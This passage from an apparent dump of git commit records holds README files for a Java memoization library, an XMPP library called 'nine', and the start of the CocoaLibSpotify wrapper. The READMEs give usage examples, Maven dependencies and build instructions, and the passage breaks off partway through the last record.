OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite], link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid] and link:https:\/\/github.com\/trivago\/triava[triava].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n* link:https:\/\/github.com\/strongh\/crache#memoization-client[crache]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","old_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n* link:https:\/\/github.com\/strongh\/crache#memoization-client[crache]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"2da19fd6825089fb845cd8f4bcfd91882d0478da","subject":"Updating README.asciidoc.","message":"Updating README.asciidoc.\n","repos":"skriptble\/nine","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= 6+1+2+0 = nine\n\nNine is an XMPP 6120 library. It contains the components necessary to build an XMPP server or client.\nThe library is broken into several packages, each of which handles a specific piece\nof the 6120 specification's functionality. These include:\n\nStream:: The stream package is responsible for separating the underlying transport layers\n(TCP implemented here, BOSH implemented in link:http:\/\/github.com\/skriptble\/gabble[gabble])\nfrom the XMPP application logic (stanza handling).\nSASL:: Handles the SASL related functionality.\nNamespace:: Maps constants to XMPP namespaces. This helps in avoiding mistyping a namespace.\nJID:: Handles JID creation and validation.\nElement:: Handles element parsing, marshalling, and manipulation.\nElement\/Stanza:: Handles stanza specific transformation and manipulation.\nBind:: Handles stream negotiation binding.\n\n== Prototype\nUnder the cmd\/prototype directory is a prototype implementation of an RFC 6120\nXMPP server. It only handles stream negotiation, however it can be expanded to handle\nother types of XMPP logic. The prototype requires a signed certificate and key to startup properly. A self signed key works for this purpose.\n","old_contents":"= 6+1+2+0 = nine\n\nAn XMPP core library\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"71a7cf5178b6d0c2e6f0c1488b99f4e6570ad906","subject":"Update readme.","message":"Update readme.\n","repos":"spectralmind\/cocoalibspotify,spotify\/cocoalibspotify,andyvand\/cocoalibspotify,andyvand\/cocoalibspotify,CrowdTunes\/cocoalibspotify,andyvand\/cocoalibspotify,CrowdTunes\/cocoalibspotify,yingwang\/Fspot,spectralmind\/cocoalibspotify,spotify\/cocoalibspotify,spotify\/cocoalibspotify,yingwang\/Fspot,CrowdTunes\/cocoalibspotify,andyvand\/cocoalibspotify,spectralmind\/cocoalibspotify,CrowdTunes\/cocoalibspotify,orta\/cocoalibspotify,spectralmind\/cocoalibspotify,spotify\/cocoalibspotify,yingwang\/Fspot","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"CocoaLibSpotify\n===============\n\nCocoaLibSpotify is an Objective-C wrapper around our libspotify library. It provides easy access to libspotify's features in a friendly, KVC\/O compliant Objective-C wrapper.\n\n*IMPORTANT:* When checking out CocoaLibSpotify, please run a +git submodule update --init+ before trying to build the sample projects.\n\nBuilding - Mac OS X\n====================\n\nThe Xcode project was built in Xcode 4.0, but should also work fine in Xcode 3.2.x.\n\nCocoaLibSpotify requires libspotify.framework, which isn't included in the repository. The Xcode project includes a build step to download and unpack it from developer.spotify.com automatically. If this fails for some reason, download it manually from developer.spotify.com and unpack it into the project folder.\n\nThe built CocoaLibSpotify.framework contains libspotify.framework as a child framework. Sometimes, Xcode gives build errors complaining it can't find <libspotify\/api.h>. If you get this, manually add the directory libspotify.framework is in to your project's \"Framework Search Paths\" build setting. For example, if you're building the CocoaLibSpotify.framework project with your application then copying it into your bundle, you'd have this:\n\n`$CONFIGURATION_BUILD_DIR\/CocoaLibSpotify.framework\/Versions\/Frameworks`\n\nOtherwise, you'd point to the downloaded libspotify.framework manually, something like this:\n\n`..\/..\/libspotify-9.1.32-Darwin-universal`\n\nBuilding - iOS\n==============\n\nAt the moment, the easiest way to build CocoaLibSpotify on iOS is to include all of the files in the \"common\" directory directory in your project. When you need to use CocoaLibSpotify, include the following header file and you'll have everything you need imported:\n\n#import \"CocoaLibSpotify.h\"\n\nOf course, you need to include libspotify in your project too. Simply download the archives from http:\/\/developer.spotify.com\/ and include the library and api.h file in your project.\n\nDocumentation\n=============\n\nThe headers of CocoaLibSpotify are well documented, and we've provided an Xcode DocSet to provide documentation right in Xcode. With these and the sample projects, you should have everything you need to dive right in!\n\nContact\n=======\n\nIf you have any problems or find any bugs, see our 